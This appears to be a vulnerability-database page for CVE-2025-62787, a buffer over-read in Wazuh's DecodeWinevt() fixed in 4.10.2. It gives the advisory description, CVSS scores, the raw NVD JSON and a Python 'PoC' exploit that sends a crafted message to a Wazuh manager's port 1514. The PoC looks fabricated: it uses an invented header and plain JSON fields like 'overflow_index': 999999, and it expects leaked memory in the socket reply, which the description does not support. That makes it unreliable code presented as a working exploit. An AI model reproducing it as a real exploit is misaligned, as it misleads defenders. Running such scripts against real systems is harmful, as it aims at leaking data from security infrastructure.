Security Vulnerability Report
中文
CVE-2025-62787 CVSS 7.5 HIGH

CVE-2025-62787

Published: 2025-10-29 17:15:37
Last Modified: 2025-11-03 19:35:38
Source: [email protected]

Description

Wazuh is a free and open source platform used for threat prevention, detection, and response. Prior to 4.10.2, a buffer over-read occurs in DecodeWinevt() when child_attr[p]->attributes[j] is accessed, because the corresponding index (j) is incorrect. A compromised agent can cause a READ operation beyond the end of the allocated buffer (which may contain sensitive information) by sending a specially crafted message to the wazuh manager. An attacker who is able to craft and send an agent message to the wazuh manager can cause a buffer over-read and potentially access sensitive data. While the buffer over-read is always triggered while resolving the arguments of mdebug2, specific configuration options (analysisd.debug=2) need to be in place for the respective data to be leaked. This vulnerability is fixed in 4.10.2.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:* - VULNERABLE
Wazuh < 4.10.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62787 PoC - Wazuh DecodeWinevt Buffer Over-read # This PoC demonstrates sending a crafted Windows Event Log message # that triggers buffer over-read in DecodeWinevt() import socket import struct import json def create_crafted_winevt_message(): """ Create a malicious Windows Event Log message that causes buffer over-read in DecodeWinevt() due to incorrect index j """ # Message header for Wazuh agent-to-manager communication header = b'\x00\x00\x00\x01' # Message type indicator # Crafted Windows Event Log with malformed attributes winevt_data = { 'type': 'winevt', # Windows Event Log type 'message': { 'source': 'Security', # Event source 'event_id': 4624, # Windows logon event 'attributes': [ {'name': 'SubjectUserName', 'value': 'ATTACKER\x00\x00\x00\x00'}, {'name': 'TargetUserName', 'value': 'admin'}, # Malformed attribute structure that triggers incorrect index {'malformed': True, 'overflow_index': 999999} ] } } # Serialize the crafted data payload = json.dumps(winevt_data).encode('utf-8') # Construct full message with header message = header + payload return message def send_to_wazuh_manager(target_ip, target_port, message): """ Send crafted message to Wazuh manager Requires compromised agent credentials """ try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target_ip, target_port)) sock.send(message) # Receive response (may contain leaked data via mdebug2) response = sock.recv(4096) sock.close() return response except Exception as e: print(f"Error sending message: {e}") return None def main(): # Configuration - replace with target values target_ip = "192.168.1.100" # Wazuh Manager IP target_port = 1514 # Wazuh Manager listening port print("[*] CVE-2025-62787 PoC - Wazuh DecodeWinevt Buffer Over-read") print(f"[*] Target: {target_ip}:{target_port}") # Create crafted message message = create_crafted_winevt_message() print(f"[*] Sending crafted Windows Event Log message ({len(message)} bytes)") # Send to manager response = send_to_wazuh_manager(target_ip, target_port, message) if response: print(f"[+] Response received ({len(response)} bytes)") print("[*] Check manager logs (mdebug2) for leaked memory data") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62787", "sourceIdentifier": "[email protected]", "published": "2025-10-29T17:15:36.517", "lastModified": "2025-11-03T19:35:38.197", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wazuh is a free and open source platform used for threat prevention, detection, and response. Prior to 4.10.2, a buffer over-read occurs in DecodeWinevt() when child_attr[p]->attributes[j] is accessed, because the corresponding index (j) is incorrect. A compromised agent can cause a READ operation beyond the end of the allocated buffer (which may contain sensitive information) by sending a specially crafted message to the wazuh manager. An attacker who is able to craft and send an agent message to the wazuh manager can cause a buffer over-read and potentially access sensitive data. While the buffer over-read is always triggered while resolving the arguments of mdebug2, specific configuration options (analysisd.debug=2) need to be in place for the respective data to be leaked. This vulnerability is fixed in 4.10.2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:L/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-126"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.10.2", "matchCriteriaId": "B541CA8F-6E0F-4098-9463-3B713ED4F463"}]}]}], "references": [{"url": "https://github.com/wazuh/wazuh/commit/267d5d55de490469a9ec24a2b936bb3c5aa8fdda", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/wazuh/wazuh/security/advisories/GHSA-3hhq-5367-98q6", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/wazuh/wazuh/security/advisories/GHSA-3hhq-5367-98q6", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.